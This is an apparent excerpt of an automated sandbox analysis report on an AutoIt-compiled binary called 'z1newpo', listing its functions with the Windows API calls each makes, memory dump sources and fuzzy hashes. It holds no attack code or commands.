                                                    Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                    • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                    • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                    • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                    • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                    • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                    Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                    • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                    • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                      • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                      • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                    • String ID:
                                                    • API String ID: 146765662-0
                                                    • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                    • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                    • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                    • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                    Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00472B63
                                                    • GetDC.USER32(00000000), ref: 00472B6C
                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                    • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                    • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                    • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                    • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                    Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDesktopWindow.USER32 ref: 00472BB2
                                                    • GetDC.USER32(00000000), ref: 00472BBB
                                                    • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                    • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                    • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                    • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                    • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                    Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __getptd_noexit.LIBCMT ref: 00415150
                                                      • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                      • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                      • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                      • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                      • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                    • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                    • __freeptd.LIBCMT ref: 0041516B
                                                    • ExitThread.KERNEL32 ref: 00415173
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                    • String ID:
                                                    • API String ID: 1454798553-0
                                                    • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                    • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                    • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                    • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                    Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _strncmp
                                                    • String ID: Q\E
                                                    • API String ID: 909875538-2189900498
                                                    • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                    • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                                    • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                                    • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                                    Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                      • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                      • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                      • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
                                                    • String ID: AutoIt3GUI$Container
                                                    • API String ID: 2652923123-3941886329
                                                    • Opcode ID: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                    • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                    • Opcode Fuzzy Hash: 662e4c56437cfc6d97a34dfd7b47562ea5a254ee8eeedf1ae9933f7f1d1523bc
                                                    • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                    Function 0044F3F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove_strncmp
                                                    • String ID: U$\
                                                    • API String ID: 2666721431-100911408
                                                    • Opcode ID: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                    • Instruction ID: d3eef72359a6f1828d14317ef8b56b8bfbdd52bf5bc7584d89ae5f72f5b530e1
                                                    • Opcode Fuzzy Hash: a4fdddafd13fd2658ce45903ac35fff56edfd8920f85f030d52c4513684e2ed7
                                                    • Instruction Fuzzy Hash: 13718F70E00245CFEF24CFA9C9906AEFBF2AF99304F24826ED445A7345D778A946CB15
                                                    Function 00467215 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181shareCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                      • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                    • __wcsnicmp.LIBCMT ref: 00467288
                                                    • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                    • String ID: LPT
                                                    • API String ID: 3035604524-1350329615
                                                    • Opcode ID: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                    • Instruction ID: cd88b7ab87c5f5a0ce5478f82160e7cdfa8c7cefd9f65e810a8a3337a25aa570
                                                    • Opcode Fuzzy Hash: df00d6e4b866e053a8717e7cd00b83b505630e9b2d4c108cf88e8e3b58e1c49d
                                                    • Instruction Fuzzy Hash: FB51E675A04204ABDB10DF54CC81FAFB7B5AB84708F10855EF905AB381E778EE85CB99
                                                    Function 0044F082 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 161COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \$h
                                                    • API String ID: 4104443479-677774858
                                                    • Opcode ID: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                    • Instruction ID: de34c7bb2fe7d28e42aef252d9636822906cf09101983ade98a7172327fa6e04
                                                    • Opcode Fuzzy Hash: a8076df7cf2e4be12816d18a067c44a6d5606508540493043604d0ea2b9ab827
                                                    • Instruction Fuzzy Hash: F551A370E002098FDF18CFA9C980AAEB7F2BFC9304F28826AD405AB345D7389D45CB55
                                                    Function 0043999F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID: &
                                                    • API String ID: 2931989736-1010288
                                                    • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                    • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                    • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                    • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                    Function 0044D3D5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: \
                                                    • API String ID: 4104443479-2967466578
                                                    • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                    • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                    • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                    • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                    Function 004667E1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 114networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00466825
                                                    • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_wcslen
                                                    • String ID: |
                                                    • API String ID: 596671847-2343686810
                                                    • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                    • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                    • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                    • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                    Function 0044835A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                    • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                    • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                    • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                    Function 0040F850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _strlen.LIBCMT ref: 0040F858
                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                      • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                    • _sprintf.LIBCMT ref: 0040F9AE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
